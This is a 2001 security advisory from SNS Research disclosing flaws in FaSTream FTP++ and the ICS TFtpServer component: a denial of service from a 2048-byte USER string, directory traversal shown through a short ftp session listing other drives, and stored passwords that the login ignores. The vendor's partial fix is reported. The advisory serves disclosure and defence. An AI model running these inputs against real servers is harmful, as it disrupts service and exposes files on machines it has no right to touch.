Date: Fri, 19 Jan 2001 21:38:33 +0100
From: SNS Research <[email protected]>
To: [email protected]Subject: Multiple Vulnerabilities In FaSTream FTP++ (+ ICS Tftpserver DoS)
=-
Note: Be advised that below mentioned DoS can be traced back to
TFtpServer. This is a (beta-)component of the "Internet Component
Suite" for Delphi/C++ Builder, availble from http://www.overbyte.be.
Other products using this component could be vulnerable, its creator
has been notified. -- SNS Research
=-
Strumpf Noir Society Advisories
! Public release !
<--#
-= Multiple Vulnerabilities In FaSTream FTP++ =-
Release date: Friday, January 19, 2001
Introduction:
FaSTream FTP++ is a filesharing application for the different MS
Windows flavours.
FaSTream FTP++ is availble from vendor Fastream Technologies'
website: http://www.fastream.com
Problem(s):
FaSTream FTP++ DoS condition
FaSTream's embedded ftp-server can be flooded into unresponsiveness
by sending a request of 2048 bytes or greater size to it.
For example:
C:\>ftp victimserver
Connected to victimserver
220 Fastream FTP++ 2 Server Ready
User (victimserver:(none)): aaaaaaaaaaaaaaaaaa(2048 bytes)
After this the server will keep accepting connections but will respond
to no commands offered.
FaSTream FTP++ path disclosure/directory browsing
When the root-directory for the ftp-server is set, any user with
access to the ftp-server can not only list the path to this dir, but
can break out of it and produce listings of other directories and
drives on the same machine.
ftp> pwd
257 "/C:/FTPROOT/" is current directory.
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.
(listing of c:\)
226 File sent ok
ftp: xx bytes received in x.xx seconds xxKbytes/sec.
Same goes for ls d:/ for example.
Note: FTP++ server is an entry level read-only server with no user
permissions (anonymous ftp). Users don't have any form of read/write
access to files outside the server-directory.
FaSTream FTP++ password protection
Altough the server part of FaSTream FTP++ features a password
protection option in its settings panel, the username/password
combinations, as are stored in the (unencrypted) servername.fpl-file,
have no relevance to the login-process. We've been told that the
commands "USER" and "PASS" are there just to maintain compatibility
with other ftp clients. FTP++ is not, nor is it intended to be an
industry-strenght ftp server.. obviously.
(..)
Solution:
Vendor has been notified and has uploaded FaSTream FTP++ Beta 10
Build 3 to its site, which fixes the path disclosure problem.
There is at this time no known fix for the DoS. This was tested
against FaSTream FTP++ 2 Beta 10 Build 2.
yadayadayada
SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html)
compliant, all information is provided on AS IS basis.
EOF, but Strumpf Noir Society will return!
